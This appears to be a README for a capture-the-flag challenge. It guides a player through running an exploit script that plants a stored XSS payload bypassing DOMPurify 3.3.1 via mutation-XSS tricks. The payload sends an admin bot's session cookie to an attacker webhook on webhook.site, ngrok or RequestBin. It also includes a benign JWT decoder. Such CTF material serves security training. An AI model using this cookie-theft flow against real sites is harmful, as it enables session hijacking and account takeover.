# 🚀 READY TO EXPLOIT - Step by Step

## ✅ Setup Complete!

The remote server is UP and accessible:
- Target: https://unrealistic-1-7e47fbb90382563c.chals.uoftctf.org
- All scripts are ready to run
- Connection tested successfully

## 🎯 THREE WAYS TO GET THE FLAG

### Method 1: webhook.site (EASIEST - Recommended)

```bash
# 1. Open https://webhook.site in your browser
# 2. Copy your unique URL

# 3. Run the exploit:
python exploit_remote.py

# 4. When prompted, paste your webhook URL
# 5. Choose option 1 (mxss1) or 10 (try all)
# 6. Check webhook.site for incoming request
# 7. Copy the 'flag' parameter value (the JWT)
# 8. Decode it:
python decode_jwt.py <paste_jwt_here>
```

### Method 2: Local server + ngrok

```bash
# Terminal 1 - Start local webhook receiver:
python webhook_server.py

# Terminal 2 - Expose to internet:
ngrok http 8080

# Terminal 3 - Run exploit:
python exploit_remote.py
# Use the ngrok HTTPS URL
# Watch Terminal 1 for auto-decoded flag!
```

### Method 3: RequestBin

```bash
# 1. Go to https://requestbin.com and create a bin
# 2. Copy the URL
# 3. Run: python exploit_remote.py
# 4. Paste RequestBin URL when prompted
# 5. Check RequestBin for the request
```

## 📋 Expected Flow

```
[Step 1] Register account on remote server → ✓
[Step 2] Send malicious message to admin   → ✓
[Step 3] Trigger admin bot                 → ✓
[Step 4] Bot logs in as admin              → (server side)
[Step 5] Bot visits /flag                  → (flag in JWT)
[Step 6] Bot visits /inbox                 → (sees your message)
[Step 7] XSS bypass executes               → (redirects to webhook)
[Step 8] Webhook receives cookie           → ✓ YOU WIN!
[Step 9] Decode JWT to get flag            → ✓ SUBMIT FLAG!
```

## 🔧 If First Attempt Fails

The exploit tries different DOMPurify bypass techniques:

1. **mxss1** - Form/Math namespace confusion (primary)
2. **mxss2** - Form/Math with different exfil method
3. **svg1** - SVG CDATA escape
4. **svg2** - SVG foreignObject
5. **mathml1** - MathML style escape
6. **clobber** - DOM clobbering attack
7. **noscript** - Noscript mutation
8. **template** - Template element bypass

Try option **10** to test all of them automatically!

## 🎓 What You're Exploiting

**Vulnerability**: Stored XSS via DOMPurify 3.3.1 bypass

The app uses DOMPurify to sanitize messages, but certain mXSS (mutation XSS) techniques can bypass it by confusing the HTML parser through namespace collisions (SVG/MathML/HTML mixing).

**The payload** redirects the admin's browser to your webhook with their session cookie (containing the flag) in the URL.

## ⚡ Quick Commands

```bash
# Test connection
python test_connection.py

# Run exploit (interactive)
python exploit_remote.py

# Decode captured JWT
python decode_jwt.py eyJhbGci...

# Run webhook server (if using ngrok)
python webhook_server.py
```

## 🏁 Success Looks Like

In your webhook, you'll see:
```
GET /?flag=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIiwiaWF0IjoxNzM2NDYwMTIzLCJleHAiOjE3MzY0NjczMjMsImZsYWciOiJ1b2Z0Y3Rme...
```

Decode that JWT and you'll find:
```json
{
  "sub": "1",
  "iat": 1736460123,
  "exp": 1736467323,
  "flag": "uoftctf{actual_flag_here}"
}
```
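To see what `decode_jwt.py` is doing under the hood, here is an added, stand-alone decoder (not the challenge's own script): it reverses the base64url encoding of the header and payload, and also shows the HS256 check that plain decoding skips, because a decoded claim set proves nothing about who issued the token. The key, the function names and the sample token are constructed for this example.

```python
import base64
import hashlib
import hmac
import json


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token: str) -> dict:
    """Split a compact JWS into header/payload dicts WITHOUT verifying it.
    Good enough for reading a captured token; never use it to trust claims."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError(f"expected 3 dot-separated segments, got {len(parts)}")
    header = json.loads(_b64url_decode(parts[0]))
    payload = json.loads(_b64url_decode(parts[1]))
    return {"header": header, "payload": payload, "signature": parts[2]}


def verify_hs256(token: str, key: bytes) -> bool:
    """Recompute HMAC-SHA256 over 'header.payload' and compare in constant time."""
    head, body, sig = token.strip().split(".")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_encode(expected), sig)


def build_sample_token(key: bytes) -> str:
    """Constructed sample: the claim set shown above, signed with a made-up key."""
    compact = {"separators": (",", ":")}
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    claims = {"sub": "1", "iat": 1736460123, "exp": 1736467323,
              "flag": "uoftctf{actual_flag_here}"}
    body = _b64url_encode(json.dumps(claims, **compact).encode())
    tag = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(tag)}"


if __name__ == "__main__":
    tok = build_sample_token(b"constructed-demo-key")
    print(json.dumps(decode_jwt(tok)["payload"], indent=2))
```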

## 🆘 Troubleshooting

| Issue | Solution |
|-------|----------|
| No webhook request | Wait 15-20 seconds, try different payloads |
| Bot trigger fails | Wait a bit, register new account, try again |
| Connection timeout | Check internet, verify server is still up |
| Webhook not working | Use webhook.site instead of local server |
| JWT won't decode | Make sure you copied the full token |

## 🎯 Ready? Let's Go!

**Recommended first try:**

1. Open https://webhook.site - copy your URL
2. Run: `python exploit_remote.py`
3. Paste webhook URL
4. Choose: `10` (try all payloads)
5. Wait and watch webhook.site
6. Decode any JWT you receive

**Time estimate**: 5-10 minutes for all payloads to run

Good luck! 🍀
